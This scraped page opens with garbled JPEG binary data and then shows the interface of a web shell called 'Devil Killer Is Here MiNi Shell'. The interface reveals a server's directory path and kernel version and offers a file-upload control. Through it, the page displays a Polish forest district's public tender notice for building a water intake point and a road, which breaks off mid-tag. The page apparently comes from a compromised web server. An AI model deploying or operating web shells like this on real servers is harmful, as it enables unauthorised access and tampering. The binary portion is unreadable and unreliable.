JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230403/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230403/0016221501-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Budowa punktu czerpania wody na terenie leśnictwa Puławy - Nadleśnictwo Polanów” – postępowanie powtórzone </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">PAŃSTWOWE GOSPODARSTWO LEŚNE &#34;LASY PAŃSTWOWE&#34; NADLEŚNICTWO POLANÓW</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 330044275</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Klonowa 12</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Polanów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">76-010</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">zachodniopomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL426 - Koszaliński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">94 318 82 37</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">polanow@szczecinek.lasy.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://polanow.szczecinek.lasy.gov.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inna państwowa jednostka organizacyjna nieposiadająca osobowości prawnej</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Gospodarka leśna </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Budowa punktu czerpania wody na terenie leśnictwa Puławy - Nadleśnictwo Polanów” – postępowanie powtórzone </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-5a8c1d20-d203-11ed-b70f-ae2d9e28ec7b</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00162215</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-04-03</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2022/BZP 00199272/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.5 Budfowa Punktu Czerpania Wody w leśnictwie Puławy</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/nadlesnictwo.polanow <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://portal.smartpzp.pl/nadlesnictwo.polanow<br/>Zamawiający będzie również komunikować się z Wykonawcami za pomocą poczty elektronicznej, email: polanow@szczecinek.lasy.gov.pl,<br/>marcin.pietrzak2@szczecinek.lasy.gov.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Podana numeracja zgodnie z SWZ:<br/>10.1.Informacje o środkach komunikacji<br/>Osobą uprawnioną do porozumiewania się z Wykonawcami jest: p. Marcin Pietrzak;<br/>e- mail: marcin.pietrzak2@szczecinek.lasy.gov.pl<br/>10.2.Komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu platformy Portalu e-Usług SMARTPZP oraz<br/>poczty elektronicznej, z zastrzeżeniem, że złożenie oferty następuje wyłącznie przy użyciu platformy Portalu e-Usług SMARTPZP.<br/>10.3.Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych, elektronicznych kopii dokumentów<br/>i oświadczeń oraz informacji przekazywanych przy ich użyciu opisane zostały w Regulaminie korzystania z platformy Portalu e-Usług<br/>SMARTPZP, stanowiącym załącznik nr 9 do SWZ.<br/>10.4.Maksymalny rozmiar plików przesyłanych za pośrednictwem platformy Portalu e-Usług SMARTPZP dedykowanych formularzy<br/>do: złożenia, zmiany, wycofania oferty oraz do komunikacji wynosi 100MB.<br/>10.5.Za datę przekazania oferty przyjmuje się datę jej złożenia na platformie Portalu e-Usług SMARTPZP. Za datę przekazania<br/>wniosków, zawiadomień, dokumentów elektronicznych, oświadczeń lub elektronicznych kopii dokumentów lub oświadczeń oraz<br/>innych informacji przyjmuje się datę ich przekazania na adres poczty elektronicznej Zamawiającego wskazany w pkt 1 lub złożenia<br/>na platformie Portalu e-Usług SMARTPZP.<br/>10.6.Zamawiający określa niezbędne wymagania techniczne umożliwiające pracę na platformie SMART PZP<br/>(https://portal.smartpzp.pl/nadlesnictwo-polanow ) tj.<br/>− Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 1 Mb/s<br/>− Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min. 3 GB RAM, procesor 1500 MHz lub lepszy, jeden z<br/>systemów operacyjnych Linux Kernel 4.0 , Windows 7 i MacOS 10.12 - Lub ich nowsze wersje,<br/>− Zainstalowana przeglądarka internetowa: Firefox ver. 65 i późniejsze, Chrome ver. 66 lub późniejsze, Opera ver. 58 lub<br/>późniejsze, Internet Explorer 11.<br/>− Przeglądarki zalecane: Chrome, Firefox, Opera.<br/>− Włączona obsługa JavaScript,<br/>− Oprogramowanie Java ver. 1.8<br/>− Zainstalowany program Acrobat Reader lub inny umożliwiający obsługę formatów .pdf.<br/>10.8. Sposób komunikowania się Zamawiającego z Wykonawcami (nie dotyczy składania i wycofania ofert):<br/>1) komunikacja pomiędzy Zamawiającym a Wykonawcami, w tym w szczególności składanie oświadczeń, wniosków, zawiadomień<br/>oraz przekazywanie informacji odbywa się elektronicznie za pośrednictwem dedykowanego formularza dostępnego na platformie<br/>Portalu e-Usług SMARTPZP oraz poczty elektronicznej. We wszelkiej korespondencji Zamawiający i Wykonawcy posługują się<br/>numerem postępowania wskazanym w SWZ.<br/>2) Zamawiający będzie również komunikować się z Wykonawcami za pomocą poczty elektronicznej, email:<br/>polanow@szczecinek.lasy.gov.pl,<br/>marcin.pietrzak2@szczecinek.lasy.gov.pl<br/>3) Dokumenty elektroniczne, oświadczenia lub elektroniczne kopie dokumentów lub oświadczeń składane są przez Wykonawcą za<br/>pośrednictwem platformy Portalu e-Usług SMARTPZP jako załączniki.</span></h3> <h3 class="mb-0">3.7.) Adres strony internetowej, pod którym są dostępne narzędzia, urządzenia lub formaty plików, które nie są ogólnie dostępne: <span class="normal">https://portal.smartpzp.pl/nadlesnictwo.polanow</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Podana numeracja zgodna z SWZ:<br/>21.1. Stosownie do art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w<br/>sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych<br/>oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych osobowych)(Dz. Urz. UE L 119 z 04 maja 2016 r.,<br/>str. 1 – „RODO”) Zamawiający informuje, iż administratorem danych osobowych jest Nadleśnictwo Polanów z siedzibą w Polanowie,<br/>ul. Klonowa 12, 76-010 Polanów, e-mail: polanow@szczecinek.lasy.gov.pl, tel. 94 318 82 37. Z inspektorem ochrony danych<br/>osobowych w Nadleśnictwie Polanów można skontaktować się na adres e-mail iod@comp-net.pl<br/>21.2. Zamawiający przetwarza dane osobowe zebrane w niniejszym postępowaniu o udzielenie zamówienia publicznego w sposób 21.3. Zamawiający udostępnia dane osobowe, o których mowa w art. 10 RODO w celu umożliwienia korzystania ze środków ochrony<br/>prawnej, o których mowa w dziale IX PZP, do upływu terminu do ich wniesienia.<br/>21.4. Do przetwarzania danych osobowych, o których mowa w art. 10 RODO mogą być dopuszczone wyłącznie osoby posiadające<br/>upoważnienie. Osoby dopuszczone do przetwarzania takich danych są obowiązane do zachowania ich w poufności<br/>21.5. Dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z prowadzeniem niniejszego<br/>postępowania o udzielenie zamówienia publicznego oraz jego rozstrzygnięciem, jak również, jeżeli nie ziszczą się przesłanki<br/>określone w art. 255-256 PZP – w celu zawarcia umowy w sprawie zamówienia publicznego oraz jej realizacji, a także<br/>udokumentowania postępowania o udzielenie zamówienia i jego archiwizacji.<br/>21.6. Odbiorcami danych osobowych będą osoby lub podmioty, którym dokumentacja postępowania zostanie udostępniona w<br/>oparciu o przepisy PZP, a także ustawy o dostępie do informacji publicznej.<br/>21.7. Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie zamówienia publicznego będą<br/>przechowywane, zgodnie z art. 78 ust. 1 PZP, przez okres 4 lat od dnia zakończenia postępowania o udzielenie zamówienia<br/>publicznego, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy w sprawie<br/>zamówienia publicznego.<br/>21.8. Niezależnie od postanowień pkt 21.7. powyżej, w przypadku zawarcia umowy w sprawie zamówienia publicznego, dane<br/>osobowe będą przetwarzane do upływu okresu przedawnienia roszczeń wynikających z umowy w sprawie zamówienia publicznego.<br/>21.9. Dane osobowe pozyskane w związku z prowadzeniem niniejszego postępowania o udzielenie zamówienia mogą zostać<br/>przekazane podmiotom świadczącym usługi doradcze, w tym usługi prawne, i konsultingowe,<br/>21.10. Stosownie do art. 22 RODO, decyzje dotyczące danych osobowych nie będą podejmowane w sposób zautomatyzowany.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">c.d. RODO, podana numeracja zgodna z SWZ:<br/>21.11. Osoba, której dotyczą pozyskane w związku z prowadzeniem niniejszego postępowania dane osobowe, ma prawo:<br/>1) dostępu do swoich danych osobowych – zgodnie z art. 15 RODO, przy czym w sytuacji, gdy wykonanie obowiązków, o których<br/>mowa w art. 15 ust. 1 -3 RODO wymagałoby niewspółmiernie dużego wysiłku Zamawiający może żądać wskazania dodatkowych<br/>informacji mających na celu sprecyzowanie żądania, w szczególności podania nazwy lub daty bieżącego bądź zakończonego<br/>postępowania o udzielenie zamówienia publicznego;<br/>2) do sprostowana swoich danych osobowych – zgodnie z art. 16 RODO, przy czym skorzystanie z uprawnienia do sprostowania lub<br/>uzupełnienia danych osobowych, o którym mowa w art. 16 RODO, nie może skutkować zmianą wyniku postępowania o udzielenie<br/>zamówienia publicznego, ani zmianą postanowień umowy w zakresie niezgodnym z PZP oraz nie może naruszać integralności<br/>protokołu oraz jego załączników;<br/>3) do żądania od Zamawiającego – jako administratora, ograniczenia przetwarzania danych osobowych z zastrzeżeniem<br/>przypadków, o których mowa w art. 18 ust. 2 RODO, przy czym prawo do ograniczenia przetwarzania nie ma zastosowania w<br/>odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby<br/>fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego; prawo to<br/>nie ogranicza przetwarzania danych osobowych do czasu zakończenia postępowania o udzielenie zamówienia publicznego;<br/>4) wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych w przypadku uznania, iż przetwarzanie jej danych osobowych<br/>narusza przepisy o ochronie danych osobowych, w tym przepisy RODO.<br/>21.12. Obowiązek podania danych osobowych jest wymogiem ustawowym określonym w przepisach PZP, związanym z udziałem w<br/>postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych określa PZP.<br/>21.13. Osobie, której dane osobowe zostały pozyskane przez Zamawiającego w związku z prowadzeniem niniejszego postępowania<br/>o udzielenie zamówienia publicznego nie przysługuje:<br/>1) prawo do usunięcia danych osobowych, o czym przesadza art. 17 ust. 3 lit. b, d lub e RODO,<br/>2) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO, określone w art. 21 RODO prawo sprzeciwu wobec<br/>przetwarzania danych osobowych, a to z uwagi na fakt, że podstawą prawną przetwarzania danych osobowych jest art. 6 ust. 1 lit. c<br/>RODO.<br/>21.14. Dane osobowe mogą być przekazywane do organów publicznych i urzędów państwowych lub innych podmiotów<br/>upoważnionych na podstawie przepisów prawa lub wykonujących zadania realizowane w interesie publicznym lub w ramach<br/>sprawowania władzy publicznej, w szczególności do podmiotów prowadzących działalność kontrolną wobec Zamawiającego. Dane<br/>osobowe są przekazywane do podmiotów przetwarzających dane w imieniu administratora danych osobowych.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">SA.270.13.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 421858,10 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3.1.Przedmiotem zamówienia jest budowa punktu czerpania wody w formie schodów z kostki brukowej o wym. 7x18x38cm, szer. 5 m oraz podestu o szer. 1,0 m wraz ze wzmocnieniem linii brzegowej na dł. całkowitej 22 mb oraz dna zbiornika, w postaci materacy gabionowych wypełnionych kruszywem grubym, materace gabionowe należy zabezpieczyć wykonując palowanie. Ponadto należy przy punkcie czerpania wody wybudować plac manewrowy o wym. 20,0 x 20,0 m wykonany z płyt zbrojonych wielotorowych betonowych o wymiarach 100x75x12,5 cm. Plac manewrowy należy ograniczyć od skarpy poboczem o nawierzchni z kruszywa i szerokości 75 cm oraz krawężnikiem drogowym 15x30 cm (w miejscu zaprojektowanych schodów wskazanych w dokumentacji projektowej) oraz krawężnikiem najazdowym 15x22 cm w pozostałej części na szerokości umocnienia brzegowego. <br/>Dodatkowo zostanie wybudowana droga wewnętrzna łącząca istniejącą drogę leśną z placem i punktem czerpania wody oraz zjazdy. Nawierzchnia drogi dojazdowej należy wykonać w układzie śladowym z płyt zbrojonych wielootworowych betonowych (miejscowo w układzie pełnym), wypełnienie pomiędzy płytami należy wykonać z mieszanki kruszywa niezwiązanego C90/3. Zjazdy należy wykonać z mieszanki kruszywa niezwiązanego C90/3.<br/>Dodatkowo Wykonawca zobowiązany jest do wykonania inwentaryzacji geodezyjnej powykonawczej wraz z przekazaniem jej do właściwego ośrodka dokumentacji geodezyjnej i kartograficznej, prowadzącego państwowy zasób geodezyjny i kartograficzny w celu wniesienia jej na mapę zasadniczą (inwentaryzację geodezyjną powykonawczą, w tym w szczególności mapę opatrzoną klauzulą urzędową, stanowiącą potwierdzenie przyjęcia do państwowego zasobu geodezyjnego i kartograficznego zbiorów danych lub dokumentów, w oparciu o które mapa ta została sporządzona Wykonawca zobowiązany jest dostarczyć nie później niż w terminie 30 dni od daty podpisania protokołu odbioru końcowego; w terminie odbioru końcowego Wykonawca przedłoży Zamawiającemu oświadczenie, że inwentaryzacja powykonawcza została ukończona i złożona w PODGiK). Koszty tych czynności (w tym dokumentacji geodezyjnej) należy uwzględnić w cenie oferty.<br/>3.2.Szczegółowy Opis Przedmiotu Zamówienia znajduje się w załączniku nr 8 do SWZ tj.:<br/>1) projektach: budowlanym i technicznym,<br/>2) specyfikacjach technicznych wykonania i odbioru robót budowlanych,<br/>3) przedmiarze robót.<br/><br/>Wykonawca zobowiązany będzie w ramach zaoferowanej ceny do wykonania wszelkich czynności oraz robót wynikających z dokumentacji stanowiącej załączniki nr 8 do SWZ oraz sporządzenia niezbędnej dokumentacji powykonawczej (operat odbiorowy, kolaudacyjny), pomiarów geodezyjnych (wytyczenie), inwentaryzacji geodezyjnej powykonawczej, zgłoszeń i uzgodnień wymaganych na etapie realizacji robót, opłat urzędowych, badań, sprawdzeń i oznaczeń laboratoryjnych dot. materiałów użytych w trakcie budowy.<br/>Podstawą wyceny oferty jest dokumentacja projektowa oraz STWIORB. Przedmiar nie stanowi wyłącznej podstawy do sporządzenia wyceny oferty.<br/>3.3.Miejscem realizacji przedmiotu zamówienia będzie teren Nadleśnictwa Polanów leśnictwo Puławy, dz. nr 163 obr. Świerczyna, 163/2, 183 obr. Bukowo Pol, gmina Polanów. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233120-6 - Roboty w zakresie budowy dróg</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45100000-8 - Przygotowanie terenu pod budowę</p> <p class="mb-0">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</p> <p class="mb-0">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</p> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <p class="mb-0">45216121-8 - Roboty budowlane w zakresie obiektów straży pożarnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">120 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Podana numeracja zgodnie z SWZ<br/>16.3. Sposób obliczania punktów dla poszczególnych kryteriów:<br/>1) W ramach kryterium „Cena” oceniana będzie cena łączna brutto podana w formularzu oferty, sporządzonym wg wzoru<br/>stanowiącego załącznik nr 1 do SWZ.<br/>W ramach kryterium „Cena” ocena ofert zostanie dokonana przy zastosowaniu wzoru:<br/> Cn<br/>C = ------------ x 60 % x 100 pkt<br/> Co<br/>gdzie:<br/>C – liczba punktów w ramach kryterium „Cena”,<br/>Cn - najniższa cena spośród ofert ocenianych,<br/>Co - cena oferty ocenianej,<br/>Z uwagi na postanowienia art. 225 ust. 1 PZP, jeżeli złożono ofertę, której wybór prowadziłby do powstania u Zamawiającego<br/>obowiązku podatkowego zgodnie z przepisami o podatku od towarów i usług, Zamawiający w celu oceny takiej oferty dolicza do<br/>przedstawionej w niej ceny podatek od towarów i usług, który miałby obowiązek rozliczyć zgodnie z tymi przepisami.<br/>W ramach kryterium „Cena” oceniana będzie cena łączna brutto podana w formularzu oferty.<br/>2) W ramach kryterium „Gwarancja” ocenie podlegać będzie zaoferowany przez Wykonawcę okres gwarancji na wykonane roboty<br/>budowlane. Ocena ofert zostanie dokonana w następujący sposób:<br/>- oferta z gwarancją 24 miesięcy – 0 pkt.<br/>- oferta z gwarancją 36 miesięcy – 20 pkt.<br/>- oferta z gwarancją 48 miesięcy – 40 pkt.<br/>Wykonawca zamieści informację o przyjęciu na siebie zobowiązania umownego dot. okresu gwarancji w formularzu oferty (załącznik<br/>nr 1 do SWZ). W przypadku braku wskazania przez Wykonawcę okresu gwarancji, uznaje się, że Wykonawca przyjmuje okres<br/>gwarancji najkrótszy (24 miesięcy) i otrzymuje 0 pkt w ramach niniejszego kryterium oceny ofert. W przypadku wskazania przez<br/>Wykonawcę okresu gwarancji krótszego niż 24 miesiące oferta podlega odrzuceniu jako niezgodna z SWZ. W przypadku<br/>zaoferowania Okresu Gwarancji na okres dłuższy niż 48 miesięcy do oceny w ramach kryterium oceny ofert przyjęty zostanie 48-<br/>miesięczny Okres Gwarancji.<br/>Wykonawca powinien zaoferować okres gwarancji w pełnych okresach i miesiącach tj.: 24, 36, 48 (i więcej miesięcy), przy czym<br/>najdłuższy możliwy okres gwarancji uwzględniony do oceny ofert to 48 miesięcy.<br/>W przypadku braku podania w ofercie Okresu Gwarancji, Zamawiający uzna, że Wykonawca zapewnia minimalną długość okresu<br/>gwarancji wymaganą przez Zamawiającego.<br/>16.4. Za najkorzystniejszą ofertę uznana zostanie oferta, która uzyska największą ilość punktów wyliczoną zgodnie ze wzorem:<br/>O = C + G<br/>Oferta może uzyskać maksymalnie 100 punktów.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span 